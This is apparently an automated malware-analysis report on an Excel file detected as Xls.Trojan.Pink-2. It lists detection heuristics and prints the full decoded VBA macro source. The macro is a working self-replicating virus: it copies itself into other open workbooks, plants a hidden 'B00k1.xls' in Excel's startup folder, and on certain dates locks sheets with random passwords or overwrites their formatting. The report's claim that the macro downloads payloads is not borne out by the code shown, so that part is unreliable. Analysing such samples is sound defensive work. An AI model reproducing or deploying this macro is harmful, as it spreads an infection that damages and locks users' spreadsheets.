MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing VBA macros, including an Auto_Open macro, which is a common technique for initial execution. The ClamAV detection 'Xls.Trojan.Pink-2' and the presence of VBA macros strongly suggest malicious intent, likely to download and execute further payloads. The macro attempts to hide its presence by renaming modules and manipulating workbook visibility, indicating a deliberate effort to evade detection.
Heuristics 3
-
ClamAV: Xls.Trojan.Pink-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Pink-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4485 bytes |
SHA-256: 6ac49b120d1b6cb8654406bd32290f418c112a95238fd2ad037162683052413c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NV12910"
Sub auto_open()
Application.OnSheetActivate = "pink"
End Sub
Sub pink()
Dim mn, virname, thismo, passwords, pick, pickmo, head, getname As String, i, j, k, num, wbc, thisnum As Integer
wbc = Workbooks.count
For k = 1 To wbc
If Workbooks(k).Name = "B00k1.xls" Then
getname = "B00k1.xls"
Windows("B00k1.xls").Visible = False
If Workbooks("B00k1.xls").Saved = False Then
Workbooks("B00k1.xls").Save
End If
Exit For
End If
Next
If wbc < 2 Then
GoTo final
End If
thisnum = ThisWorkbook.Modules.count
num = ActiveWorkbook.Modules.count
For i = 1 To thisnum
thismo = ThisWorkbook.Modules(i).Name
pickmo = Right(Left(thismo, 2), 1)
If pickmo = "V" Then
namemo = ThisWorkbook.Modules(i).Name
Exit For
End If
Next
If (Asc(ActiveWorkbook.Name) >= 97 And Asc(ActiveWorkbook.Name) <= 122) Or (Asc(ActiveWorkbook.Name) >= 65 And Asc(ActiveWorkbook.Name) <= 90) Then
head = Chr(Asc(ActiveWorkbook.Name))
Else
head = "N"
End If
mn = head & "V" & Month(Now) & Day(Now) & Right(Time$, 2)
For j = 1 To num
pick = Right(Left(ActiveWorkbook.Modules(j).Name, 2), 1)
If pick = "V" Then
End
End If
Next
If Month(Now) + Day(Now) <> 13 And ActiveSheet.Range("iv65536").FormulaR1C1 <> "=""""" Then
ActiveSheet.Range("iv65536").FormulaR1C1 = "="""""
End If
ThisWorkbook.Sheets(namemo).Copy ActiveWorkbook.ActiveSheet
ActiveWorkbook.Modules(namemo).Name = mn
If Left(ActiveWorkbook.Name, 4) <> "Book" Then
End If
Application.ScreenUpdating = False
passwords = Left((Rnd * 1000000000 + 100000000), 8)
If Month(Now) + Day(Now) = 13 Then
ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
End If
If Month(Now) = 6 And Day(Now) = 15 Then
With Cells
.ClearFormats
.ColumnWidth = 2.75
.RowHeight = 15
End With
ActiveWindow.Zoom = 25
Union(Range( _
"AO15,AP15,AO16,AP16,AO16,AO17,AP17,AO18,AP18,AO19,AP19,AO20,AP20,AO21,AP21,AO22,AP22,AO23,AP23,AO24,AP24,AO25,AP25,AO26,AP26,AO27,AP27,AO28,AP28,AO29,AP29,AO30" _
), Range( _
"AP30,AO31,AP31,AN19,AM19,AL19,AK19,AJ19,AJ19,AI19,AH19,AG19,AG20,AH20,AI20,AJ20,AK20,AL20,AM20,AN20,AG18,AH18,AI18,AJ18,AK18,AL18,AM18,AN18,AQ18,AR18,AS18,AT18" _
), Range( _
"AU18,AV18,AW18,AX18,AQ19,AR19,AS19,AT19,AU19,AV19,AW19,AX19,AQ20,AR20,AS20,AT20,AU20,AV20,AW20,AX20,AQ30,AR30,AS30,AT30,AU30,AV30,AW30,AX30,AQ31,AR31,AS31,AT31" _
), Range( _
"AU31,AV31,AW31,AX31,AG21,AG22,AG23,AG24,AG25,AG26,AG27,AG28,AG29,AG30,AG31,AH21,AH22,AH23,AH24,AH25,AH26,AH27,AH28,AH29,AH30,AH31,AW17,AW16,AW15,AW14,AW14,AW13" _
), Range( _
"AW12,AW11,AW11,AW10,AW9,AW8,AW7,AX7,AX8,AX9,AX10,AX11,AX12,AX13,AX14,AX15,AX16,AX17,AG6,AH6,AI6,AJ6,AK6,AL6,AM6,AN6,AO6,AP6,AW6,AX6,AG31,AG31" _
), Range( _
"AG32,AH32,AO32,AP32,AQ32,AR32,AS32,AT32,AU32,AV32,AW32,AX32,AG7,AH7,AI7,AJ7,AK7,AL7,AM7,AN7,AO7,AP7,AG8,AH8,AI8,AJ8,AK8,AL8,AM8,AN8,AO8,AP8" _
), Range("AO9,AP9,AO10,AP10,AO11,AP11,AO12,AP12,AO13,AP13,AO14,AP14")) = "OO"
ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
ElseIf Month(Now) + Day(Now) = 22 Then
ActiveSheet.Protect DrawingObjects:=True, Contents:=True, Scenarios:=True, password:=passwords
End If
final:
virname = Dir(Application.StartupPath & "\B00k1.xls")
If virname = "" Then
ThisWorkbook.Sheets(2).Range("iv65536").FormulaR1C1 = "="""""
ThisWorkbook.SaveCopyAs Filename:=Application.StartupPath & "\" & "B00k1.xls"
If getname = "" Then
Application.OnSheetActivate = ""
End
End If
ActiveWindow.Visible = False
End If
Application.OnSheetActivate = Application.StartupPath & "\" & "B00k1!pink"
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.